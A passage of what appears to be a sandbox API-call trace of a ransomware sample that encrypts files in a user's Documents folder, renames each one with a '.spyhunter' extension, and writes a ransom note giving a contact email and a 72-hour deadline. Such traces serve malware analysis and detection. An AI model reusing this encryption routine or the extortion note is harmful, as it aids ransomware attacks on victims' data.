lpNumberOfBytesWritten=0x248ef4c*=0x4, lpOverlapped=0x0) returned 1 [0148.496] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef4c*=0x30, lpOverlapped=0x0) returned 1 [0148.496] CloseHandle (hObject=0x9c) returned 1 [0148.496] GetProcessHeap () returned 0x2c0000 [0148.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.497] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.spyhunter") returned 75 [0148.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.spyhunter")) returned 1 [0148.497] GetProcessHeap () returned 0x2c0000 [0148.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.497] GetProcessHeap () returned 0x2c0000 [0148.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.498] GetProcessHeap () returned 0x2c0000 [0148.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09588 | out: hHeap=0x2c0000) returned 1 [0148.498] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef90 | out: pbBuffer=0x248ef90) returned 1 [0148.498] GetProcessHeap () returned 0x2c0000 [0148.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.498] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef88*=0x30) returned 1 [0148.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.498] GetProcessHeap () returned 0x2c0000 [0148.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.498] GetProcessHeap () returned 0x2c0000 [0148.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d878 | out: hHeap=0x2c0000) returned 1 [0148.498] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef88 | out: pbBuffer=0x248ef88) returned 1 [0148.498] GetProcessHeap () returned 0x2c0000 [0148.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.498] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef80*=0x30) returned 1 [0148.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.498] GetProcessHeap () returned 0x2c0000 [0148.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.499] GetProcessHeap () returned 0x2c0000 [0148.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a22d0 | out: hHeap=0x2c0000) returned 1 [0148.499] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef88 | out: pbBuffer=0x248ef88) returned 1 [0148.499] GetProcessHeap () returned 0x2c0000 [0148.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.499] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef80*=0x30) returned 1 [0148.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mpSpW799wlM_t.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mpspw799wlm_t.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.499] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mpSpW799wlM_t.docx") returned 62 [0148.499] StrStrW (lpFirst="mpSpW799wlM_t.docx", lpSrch=".txt") returned 0x0 [0148.499] GetProcessHeap () returned 0x2c0000 [0148.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.500] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef44*=0x2800, lpOverlapped=0x0) returned 1 [0148.500] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.500] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef44*=0x2800, lpOverlapped=0x0) returned 1 [0148.500] GetProcessHeap () returned 0x2c0000 [0148.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.501] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.501] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef44, lpOverlapped=0x0 | out: lpBuffer=0x248ef84*, lpNumberOfBytesWritten=0x248ef44*=0x4, lpOverlapped=0x0) returned 1 [0148.501] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef44*=0x30, lpOverlapped=0x0) returned 1 [0148.501] CloseHandle (hObject=0x9c) returned 1 [0148.501] GetProcessHeap () returned 0x2c0000 [0148.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.501] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mpSpW799wlM_t.docx.spyhunter") returned 72 [0148.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mpSpW799wlM_t.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mpspw799wlm_t.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mpSpW799wlM_t.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mpspw799wlm_t.docx.spyhunter")) returned 1 [0148.502] GetProcessHeap () returned 0x2c0000 [0148.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.502] GetProcessHeap () returned 0x2c0000 [0148.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.502] GetProcessHeap () returned 0x2c0000 [0148.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85eb0 | out: hHeap=0x2c0000) returned 1 [0148.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef80 | out: pbBuffer=0x248ef80) returned 1 [0148.502] GetProcessHeap () returned 0x2c0000 [0148.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef78*=0x30) returned 1 [0148.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LSW1ZChx5hwfqT89JIs.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lsw1zchx5hwfqt89jis.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.503] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LSW1ZChx5hwfqT89JIs.xlsx") returned 68 [0148.503] StrStrW (lpFirst="LSW1ZChx5hwfqT89JIs.xlsx", lpSrch=".txt") returned 0x0 [0148.503] GetProcessHeap () returned 0x2c0000 [0148.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.503] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef3c*=0x2800, lpOverlapped=0x0) returned 1 [0148.503] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.504] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef3c*=0x2800, lpOverlapped=0x0) returned 1 [0148.504] GetProcessHeap () returned 0x2c0000 [0148.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.504] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.504] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x248ef7c*, lpNumberOfBytesWritten=0x248ef3c*=0x4, lpOverlapped=0x0) returned 1 [0148.504] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef3c*=0x30, lpOverlapped=0x0) returned 1 [0148.504] CloseHandle (hObject=0x9c) returned 1 [0148.504] GetProcessHeap () returned 0x2c0000 [0148.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.504] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LSW1ZChx5hwfqT89JIs.xlsx.spyhunter") returned 78 [0148.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LSW1ZChx5hwfqT89JIs.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lsw1zchx5hwfqt89jis.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LSW1ZChx5hwfqT89JIs.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lsw1zchx5hwfqt89jis.xlsx.spyhunter")) returned 1 [0148.505] GetProcessHeap () returned 0x2c0000 [0148.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.505] GetProcessHeap () returned 0x2c0000 [0148.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.505] GetProcessHeap () returned 0x2c0000 [0148.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c817c8 | out: hHeap=0x2c0000) returned 1 [0148.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef80 | out: pbBuffer=0x248ef80) returned 1 [0148.505] GetProcessHeap () returned 0x2c0000 [0148.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef78*=0x30) returned 1 [0148.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LbwYUX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lbwyux.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LbwYUX.pptx") returned 55 [0148.506] StrStrW (lpFirst="LbwYUX.pptx", lpSrch=".txt") returned 0x0 [0148.506] GetProcessHeap () returned 0x2c0000 [0148.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.506] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef3c*=0xf37, lpOverlapped=0x0) returned 1 [0148.507] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff0c9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.507] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xf37, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef3c*=0xf37, lpOverlapped=0x0) returned 1 [0148.507] GetProcessHeap () returned 0x2c0000 [0148.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.507] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.507] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x248ef7c*, lpNumberOfBytesWritten=0x248ef3c*=0x4, lpOverlapped=0x0) returned 1 [0148.507] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef3c*=0x30, lpOverlapped=0x0) returned 1 [0148.507] CloseHandle (hObject=0x9c) returned 1 [0148.507] GetProcessHeap () returned 0x2c0000 [0148.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.507] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LbwYUX.pptx.spyhunter") returned 65 [0148.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LbwYUX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lbwyux.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LbwYUX.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lbwyux.pptx.spyhunter")) returned 1 [0148.508] GetProcessHeap () returned 0x2c0000 [0148.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.508] GetProcessHeap () returned 0x2c0000 [0148.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.508] GetProcessHeap () returned 0x2c0000 [0148.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2218 | out: hHeap=0x2c0000) returned 1 [0148.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef78 | out: pbBuffer=0x248ef78) returned 1 [0148.509] GetProcessHeap () returned 0x2c0000 [0148.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.509] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef70*=0x30) returned 1 [0148.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I4HgpeGmyyS0eIe.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i4hgpegmyys0eie.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I4HgpeGmyyS0eIe.xlsx") returned 64 [0148.509] StrStrW (lpFirst="I4HgpeGmyyS0eIe.xlsx", lpSrch=".txt") returned 0x0 [0148.509] GetProcessHeap () returned 0x2c0000 [0148.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.509] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef34*=0x2800, lpOverlapped=0x0) returned 1 [0148.510] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.510] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef34*=0x2800, lpOverlapped=0x0) returned 1 [0148.510] GetProcessHeap () returned 0x2c0000 [0148.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.510] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.510] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x248ef74*, lpNumberOfBytesWritten=0x248ef34*=0x4, lpOverlapped=0x0) returned 1 [0148.511] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef34*=0x30, lpOverlapped=0x0) returned 1 [0148.511] CloseHandle (hObject=0x9c) returned 1 [0148.511] GetProcessHeap () returned 0x2c0000 [0148.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.511] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I4HgpeGmyyS0eIe.xlsx.spyhunter") returned 74 [0148.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I4HgpeGmyyS0eIe.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i4hgpegmyys0eie.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I4HgpeGmyyS0eIe.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i4hgpegmyys0eie.xlsx.spyhunter")) returned 1 [0148.512] GetProcessHeap () returned 0x2c0000 [0148.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.512] GetProcessHeap () returned 0x2c0000 [0148.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.512] GetProcessHeap () returned 0x2c0000 [0148.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e094b8 | out: hHeap=0x2c0000) returned 1 [0148.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef78 | out: pbBuffer=0x248ef78) returned 1 [0148.512] GetProcessHeap () returned 0x2c0000 [0148.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef70*=0x30) returned 1 [0148.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HY5gIW_3DlnUvRg.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hy5giw_3dlnuvrg.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.512] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HY5gIW_3DlnUvRg.odp") returned 63 [0148.512] StrStrW (lpFirst="HY5gIW_3DlnUvRg.odp", lpSrch=".txt") returned 0x0 [0148.512] GetProcessHeap () returned 0x2c0000 [0148.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.513] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef34*=0x2800, lpOverlapped=0x0) returned 1 [0148.513] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.513] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef34*=0x2800, lpOverlapped=0x0) returned 1 [0148.513] GetProcessHeap () returned 0x2c0000 [0148.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.514] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.514] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x248ef74*, lpNumberOfBytesWritten=0x248ef34*=0x4, lpOverlapped=0x0) returned 1 [0148.514] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef34*=0x30, lpOverlapped=0x0) returned 1 [0148.514] CloseHandle (hObject=0x9c) returned 1 [0148.514] GetProcessHeap () returned 0x2c0000 [0148.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.514] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HY5gIW_3DlnUvRg.odp.spyhunter") returned 73 [0148.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HY5gIW_3DlnUvRg.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hy5giw_3dlnuvrg.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HY5gIW_3DlnUvRg.odp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hy5giw_3dlnuvrg.odp.spyhunter")) returned 1 [0148.515] GetProcessHeap () returned 0x2c0000 [0148.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.515] GetProcessHeap () returned 0x2c0000 [0148.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.515] GetProcessHeap () returned 0x2c0000 [0148.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85de8 | out: hHeap=0x2c0000) returned 1 [0148.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.516] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.516] WriteFile (in: hFile=0x9c, lpBuffer=0x248eea7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248efd0, lpOverlapped=0x0 | out: lpBuffer=0x248eea7*, lpNumberOfBytesWritten=0x248efd0*=0x127, lpOverlapped=0x0) returned 1 [0148.517] lstrlenA 